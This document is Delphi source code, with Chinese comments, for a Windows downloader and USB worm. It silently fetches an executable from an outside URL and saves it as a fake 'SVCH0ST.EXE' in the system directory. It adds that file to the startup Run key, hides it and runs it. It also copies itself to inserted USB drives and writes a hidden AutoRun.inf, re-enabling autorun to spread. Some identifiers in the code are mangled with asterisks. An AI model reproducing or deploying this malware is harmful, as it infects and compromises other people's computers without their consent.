unit Un_Main; interface uses Windows, Messages, SysUtils,Forms,IniFiles; type TFrm_Main = class(TForm) procedure Form*(Sender: TObject); procedure FormClose(Sender: TObject; var Action: TCloseAction); private procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE; public { Public declarations } end; const exefile = ‘SVCH0ST.EXE‘; Buffer = ‘http://www.888.com/hello.exe‘; DBT_DEVICEARRIVAL = $$8000; // system detected a new device DBT_DEVICEREMOVECOMPLETE = $$8004; // device is gone DBT_DEVTYP_VOLUME = $$00000002; // logical volume DBTF_MEDIA = $$0001; // media comings and goings type PDEV_BROADCAST_HDR = ^TDEV_BROADCAST_HDR; TDEV_BROADCAST_HDR = packed record dbch_size : DWORD; dbch_devicetype : DWORD; dbch_reserved : DWORD; end; PDEV_BROADCAST_VOLUME = ^TDEV_BROADCAST_VOLUME; TDEV_BROADCAST_VOLUME = packed record dbcv_size : DWORD; dbcv_devicetype : DWORD; dbcv_reserved : DWORD; dbcv_unitmask : DWORD; dbcv_flags : WORD; end; function UrlDownLoadToFile(Caller,URL,FileName: PAnsiChar;Reserved: LongWord; StatusCB: Pointer): LongWord; stdcall; external ‘URLMON.DLL‘ name ‘URLDownloadToFileA‘; function Win*(lpCmdline: PAnsiChar; uCmdShow: LongWord): LongWord; stdcall; external ‘kernel32.dll‘ name ‘Win*‘; var Frm_Main: TFrm_Main; exefull:string; implementation {$$R *.dfm} function SetRegValue(key:Hkey; subkey,name,value:string):boolean; var regkey:hkey; begin result := false; Reg*Key(key,PChar(subkey),regkey); if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then result := true; RegCloseKey(regkey); end; procedure Startup(var TheName:string); begin SetRegValue(HKEY_LOCAL_MACHINE,‘Software\Microsoft\Windows\CurrentVersion\Run‘,‘SVCH0ST‘,TheName); UrlDownloadToFile(nil, PChar(Buffer), PChar(TheName), 0, nil); SetFileAttributes(PChar(TheName),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM); messagebox(0,‘文件下载成功！‘,‘成功‘,MB_OK); Win*(PChar(TheName), SW_SHOWDEFAULT); //Sleep(500); //*Me; //freemem(@path,256); end; procedure TFrm_Main.WMDeviceChange(var Msg: TMessage); var lpdb : PDEV_BROADCAST_HDR; lpdbv : PDEV_BROADCAST_VOLUME; unitmask:DWORD; i:integer; MyIni:TIniFile; s:Hkey; value:dword ; inifile:string; begin lpdb := PDEV_BROADCAST_HDR(Msg.LParam); case Msg.WParam of DBT_DEVICEARRIVAL ://有设备安装完毕 if lpdb.dbch_devicetype=DBT_DEVTYP_VOLUME then begin lpdbv := PDEV_BROADCAST_VOLUME(lpdb); unitmask:=lpdbv.dbcv_unitmask;//取得设备的盘符 for i:=0 to 25 do //遍历磁盘 begin if Boolean(unitmask and $$1)then//看该驱动器的状态是否发生了变化 break; unitmask := unitmask shr 1; end; if fileexists(exefull) then //向u盘拷文件 begin copyfile(PChar(exefull),Pchar(char(i+65) + ‘:\‘ + exefile),false); FileSetAttr(char(i+65) + ‘:\‘ + exefile,$$00000003); end; inifile:=char(i+65)+‘:\AutoRun.inf‘;//ini文件 RegOpenKeyEx(HKEY_CURRENT_USER, ‘Software\Microsoft\Windows\CurrentVersion\Policies\Explorer‘, 0, KEY_ALL_ACCESS, s); value:=0; RegSetValueEx(s,‘NoDriveTypeAutoRun‘,0, REG_DWORD,@value, sizeof(value)); RegCloseKey(s); if fileexists(inifile) then begin FileSetAttr(inifile,$$00000000); *File(inifile); end; MyIni := TIniFile.*(inifile); MyIni.WriteString(‘AutoRun‘, ‘open‘,exefile); FileSetAttr(inifile,$$00000003); end; end; end; procedure TFrm_Main.Form*(Sender: TObject); var s:hkey; value:array*0..255*of char; size:*inal; path:array*0..255* of char; begin Application.ShowMainForm:=False; getsystemdirectory(path,120); exefull := strpas(path) + ‘\‘ + exefile; size:=256; RegOpenKeyEx(HKEY_LOCAL_MACHINE,‘Software\Microsoft\Windows\CurrentVersion\Run‘,0,KEY_ALL_ACCESS,s); RegQueryValueEx(s,‘SVCH0ST‘,nil,nil,@value,@size); RegCloseKey(s); //文件存在且有自启动 if fileexists(‘C:\WINDOWS\system32\SVCH0ST.EXE‘) and (UpperCase(value) = UpperCase(exefull)) then messagebox(0,‘自启动成功！‘,‘成功‘,MB_OK) else Startup(exefull);//下载执行函数 end; procedure TFrm_Main.FormClose(Sender: TObject; var Action: TCloseAction); begin Application.Terminate; end; end.